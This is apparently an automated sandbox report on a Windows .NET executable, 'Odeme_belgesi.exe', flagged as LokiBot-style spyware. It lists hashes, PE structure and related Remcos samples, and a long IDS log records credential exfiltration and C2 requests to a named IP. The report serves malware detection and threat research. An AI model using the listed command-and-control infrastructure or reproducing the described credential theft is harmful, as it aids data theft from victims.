              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1523245
              Start date and time:2024-10-01 10:54:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 30s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Odeme_belgesi.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@6/3@3/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 88
              • Number of non-executed functions: 47
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              04:55:00API Interceptor105x Sleep call for process: Odeme_belgesi.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CMCSUSm7DmyQOKD7.exeGet hashmaliciousRHADAMANTHYSBrowse
              • 45.66.231.126
              AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
              • 45.90.89.98
              factura proforma .docx.docGet hashmaliciousRemcosBrowse
              • 45.90.89.98
              SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
              • 45.66.231.90
              l.exeGet hashmaliciousUnknownBrowse
              • 45.66.231.185
              winx86.exeGet hashmaliciousUnknownBrowse
              • 45.66.231.185
              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
              • 45.90.89.98
              5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
              • 45.89.247.65
              bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
              • 45.66.231.89
              Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
              • 45.89.247.65
              No context
              No context
              Process:C:\Users\user\Desktop\Odeme_belgesi.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):706
              Entropy (8bit):5.349842958726647
              Encrypted:false
              SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
              MD5:873FA73F7EAAC5A90DC38988855C5032
              SHA1:694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
              SHA-256:501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
              SHA-512:3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
              Process:C:\Users\user\Desktop\Odeme_belgesi.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview:1
              Process:C:\Users\user\Desktop\Odeme_belgesi.exe
              File Type:data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):1.0424600748477153
              Encrypted:false
              SSDEEP:3:/lbq:4
              MD5:8CB7B7F28464C3FCBAE8A10C46204572
              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
              Malicious:false
              Reputation:high, very likely benign file
              Preview:........................................user.
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.299652759207166
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.96%
              • Win16/32 Executable Delphi generic (2074/23) 0.01%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:Odeme_belgesi.exe
              File size:554'496 bytes
              MD5:fc9c0d308e1e66caf355a329f171362a
              SHA1:f88d0427a7fab032dcc647f68facf43fcda1857e
              SHA256:079f962ef81e19092c633fe2e44d5ebb31eb83c0cb5d1052e1a048e15ba549c8
              SHA512:01fcfe9c0a3d90ab703a08609ca2cac512875a12f7eb3f1495451cb2e99bd4d3aa1e2382a36d8e94144bcb83c1fcd8105b1283f202a6c70f258fd2b1b7927c3e
              SSDEEP:12288:GLdf+AksR4vnxuBvV50UKzaiIVJWLllyzD7ejNrkko:g8AksengBv0N2kNrkko
              TLSH:E9C44AF83670A1BDD02BEC3AD8E90C94DF41289F4BE9670141AB097D5D2D497DA2C4EE
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..f.................................`... ....@.. ....................................`................................
              Icon Hash:0a4ae2e8e8b89241
              Entrypoint:0x48e00a
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x66FBAF50 [Tue Oct 1 08:14:08 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [0048E000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x5677c0x4f.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x29928.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x8e0000x8
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x560000x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              pNld"O0x20000x52a500x52c003f1cb0190f65894fab069fc9e0a370f0False1.0003274877265862data7.999478956820455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .text0x560000xa6480xa800e40263a58ddd540af9b0c69279d1f2d2False0.3640020461309524data4.520655192638587IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0x620000x299280x29a00a4d01d0aac38670a077c40a91bada689False0.09138044294294294data4.531005903103513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x8c0000xc0x200a40069bf8b25090b384bf1696beeb86cFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              0x8e0000x100x20065a7e7a1b501457571bfaddf2142e7efFalse0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x622b00x1194PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9431111111111111
              RT_ICON0x634440x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.029501360463740682
              RT_ICON0x73c6c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.05749421904561699
              RT_ICON0x7d1140x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.07587800369685767
              RT_ICON0x8259c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.06164383561643835
              RT_ICON0x867c40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.11597510373443984
              RT_ICON0x88d6c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.14657598499061913
              RT_ICON0x89e140x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.24795081967213115
              RT_ICON0x8a79c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.32269503546099293
              RT_GROUP_ICON0x8ac040x84data0.7196969696969697
              RT_VERSION0x8ac880x3c8data0.40289256198347106
              RT_MANIFEST0x8b0500x8d3XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3935369632580788
              DLLImport
              mscoree.dll_CorExeMain
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-10-01T10:54:58.990484+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449797TCP
              2024-10-01T10:54:59.017244+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973045.66.231.24280TCP
              2024-10-01T10:54:59.017244+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973045.66.231.24280TCP
              2024-10-01T10:54:59.017244+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973045.66.231.24280TCP
              2024-10-01T10:54:59.840322+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973045.66.231.24280TCP
              2024-10-01T10:55:00.012405+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973145.66.231.24280TCP
              2024-10-01T10:55:00.012405+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973145.66.231.24280TCP
              2024-10-01T10:55:00.012405+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973145.66.231.24280TCP
              2024-10-01T10:55:00.929821+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973145.66.231.24280TCP
              2024-10-01T10:55:01.012878+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973245.66.231.24280TCP
              2024-10-01T10:55:01.012878+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973245.66.231.24280TCP
              2024-10-01T10:55:01.012878+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973245.66.231.24280TCP
              2024-10-01T10:55:01.753408+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973245.66.231.24280TCP
              2024-10-01T10:55:01.753408+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973245.66.231.24280TCP
              2024-10-01T10:55:01.758214+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449732TCP
              2024-10-01T10:55:01.929584+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973345.66.231.24280TCP
              2024-10-01T10:55:01.929584+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973345.66.231.24280TCP
              2024-10-01T10:55:01.929584+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973345.66.231.24280TCP
              2024-10-01T10:55:02.666163+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973345.66.231.24280TCP
              2024-10-01T10:55:02.666163+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973345.66.231.24280TCP
              2024-10-01T10:55:02.671005+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449733TCP
              2024-10-01T10:55:02.838931+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973445.66.231.24280TCP
              2024-10-01T10:55:02.838931+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973445.66.231.24280TCP
              2024-10-01T10:55:02.838931+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973445.66.231.24280TCP
              2024-10-01T10:55:03.554360+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973445.66.231.24280TCP
              2024-10-01T10:55:03.554360+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973445.66.231.24280TCP
              2024-10-01T10:55:03.560722+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449734TCP
              2024-10-01T10:55:03.734897+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973545.66.231.24280TCP
              2024-10-01T10:55:03.734897+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973545.66.231.24280TCP
              2024-10-01T10:55:03.734897+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973545.66.231.24280TCP
              2024-10-01T10:55:04.620841+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973545.66.231.24280TCP
              2024-10-01T10:55:04.620841+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973545.66.231.24280TCP
              2024-10-01T10:55:04.625681+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449735TCP
              2024-10-01T10:55:04.791909+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973645.66.231.24280TCP
              2024-10-01T10:55:04.791909+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973645.66.231.24280TCP
              2024-10-01T10:55:04.791909+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973645.66.231.24280TCP
              2024-10-01T10:55:05.540676+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973645.66.231.24280TCP
              2024-10-01T10:55:05.540676+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973645.66.231.24280TCP
              2024-10-01T10:55:05.545578+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449736TCP
              2024-10-01T10:55:05.714856+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973745.66.231.24280TCP
              2024-10-01T10:55:05.714856+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973745.66.231.24280TCP
              2024-10-01T10:55:05.714856+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973745.66.231.24280TCP
              2024-10-01T10:55:06.533521+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973745.66.231.24280TCP
              2024-10-01T10:55:06.533521+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973745.66.231.24280TCP
              2024-10-01T10:55:06.538355+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449737TCP
              2024-10-01T10:55:06.689995+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973845.66.231.24280TCP
              2024-10-01T10:55:06.689995+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973845.66.231.24280TCP
              2024-10-01T10:55:06.689995+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973845.66.231.24280TCP
              2024-10-01T10:55:10.377698+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973845.66.231.24280TCP
              2024-10-01T10:55:10.377698+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973845.66.231.24280TCP
              2024-10-01T10:55:10.382539+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449738TCP
              2024-10-01T10:55:10.539446+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973945.66.231.24280TCP
              2024-10-01T10:55:10.539446+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973945.66.231.24280TCP
              2024-10-01T10:55:10.539446+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973945.66.231.24280TCP
              2024-10-01T10:55:11.258339+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973945.66.231.24280TCP
              2024-10-01T10:55:11.258339+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973945.66.231.24280TCP
              2024-10-01T10:55:11.263234+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449739TCP
              2024-10-01T10:55:11.431407+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974045.66.231.24280TCP
              2024-10-01T10:55:11.431407+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974045.66.231.24280TCP
              2024-10-01T10:55:11.431407+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974045.66.231.24280TCP
              2024-10-01T10:55:12.104380+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974045.66.231.24280TCP
              2024-10-01T10:55:12.104380+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974045.66.231.24280TCP
              2024-10-01T10:55:12.109161+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449740TCP
              2024-10-01T10:55:12.290926+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974145.66.231.24280TCP
              2024-10-01T10:55:12.290926+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974145.66.231.24280TCP
              2024-10-01T10:55:12.290926+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974145.66.231.24280TCP
              2024-10-01T10:55:12.998782+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974145.66.231.24280TCP
              2024-10-01T10:55:12.998782+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974145.66.231.24280TCP
              2024-10-01T10:55:13.003680+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449741TCP
              2024-10-01T10:55:13.156783+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974245.66.231.24280TCP
              2024-10-01T10:55:13.156783+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974245.66.231.24280TCP
              2024-10-01T10:55:13.156783+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974245.66.231.24280TCP
              2024-10-01T10:55:13.904671+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974245.66.231.24280TCP
              2024-10-01T10:55:13.904671+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974245.66.231.24280TCP
              2024-10-01T10:55:13.909463+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449742TCP
              2024-10-01T10:55:14.059014+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974445.66.231.24280TCP
              2024-10-01T10:55:14.059014+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974445.66.231.24280TCP
              2024-10-01T10:55:14.059014+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974445.66.231.24280TCP
              2024-10-01T10:55:14.896174+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974445.66.231.24280TCP
              2024-10-01T10:55:14.896174+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974445.66.231.24280TCP
              2024-10-01T10:55:14.902772+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449744TCP
              2024-10-01T10:55:15.181877+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974745.66.231.24280TCP
              2024-10-01T10:55:15.181877+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974745.66.231.24280TCP
              2024-10-01T10:55:15.181877+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974745.66.231.24280TCP
              2024-10-01T10:55:15.839773+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974745.66.231.24280TCP
              2024-10-01T10:55:15.839773+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974745.66.231.24280TCP
              2024-10-01T10:55:15.845470+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449747TCP
              2024-10-01T10:55:16.001641+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974945.66.231.24280TCP
              2024-10-01T10:55:16.001641+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974945.66.231.24280TCP
              2024-10-01T10:55:16.001641+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974945.66.231.24280TCP
              2024-10-01T10:55:16.898883+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974945.66.231.24280TCP
              2024-10-01T10:55:16.898883+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974945.66.231.24280TCP
              2024-10-01T10:55:16.904506+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449749TCP
              2024-10-01T10:55:17.057243+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975245.66.231.24280TCP
              2024-10-01T10:55:17.057243+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975245.66.231.24280TCP
              2024-10-01T10:55:17.057243+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975245.66.231.24280TCP
              2024-10-01T10:55:20.761788+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975245.66.231.24280TCP
              2024-10-01T10:55:20.761788+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975245.66.231.24280TCP
              2024-10-01T10:55:20.766594+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449752TCP
              2024-10-01T10:55:20.935914+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975345.66.231.24280TCP
              2024-10-01T10:55:20.935914+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975345.66.231.24280TCP
              2024-10-01T10:55:20.935914+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975345.66.231.24280TCP
              2024-10-01T10:55:21.655036+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975345.66.231.24280TCP
              2024-10-01T10:55:21.655036+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975345.66.231.24280TCP
              2024-10-01T10:55:21.659847+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449753TCP
              2024-10-01T10:55:21.808725+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975445.66.231.24280TCP
              2024-10-01T10:55:21.808725+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975445.66.231.24280TCP
              2024-10-01T10:55:21.808725+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975445.66.231.24280TCP
              2024-10-01T10:55:22.549440+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975445.66.231.24280TCP
              2024-10-01T10:55:22.549440+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975445.66.231.24280TCP
              2024-10-01T10:55:22.554283+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449754TCP
              2024-10-01T10:55:22.700322+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975545.66.231.24280TCP
              2024-10-01T10:55:22.700322+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975545.66.231.24280TCP
              2024-10-01T10:55:22.700322+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975545.66.231.24280TCP
              2024-10-01T10:55:23.470660+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975545.66.231.24280TCP
              2024-10-01T10:55:23.470660+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975545.66.231.24280TCP
              2024-10-01T10:55:23.475666+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449755TCP
              2024-10-01T10:55:23.622010+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975645.66.231.24280TCP
              2024-10-01T10:55:23.622010+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975645.66.231.24280TCP
              2024-10-01T10:55:23.622010+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975645.66.231.24280TCP
              2024-10-01T10:55:24.552098+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975645.66.231.24280TCP
              2024-10-01T10:55:24.552098+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975645.66.231.24280TCP
              2024-10-01T10:55:24.556972+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449756TCP
              2024-10-01T10:55:24.716379+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975745.66.231.24280TCP
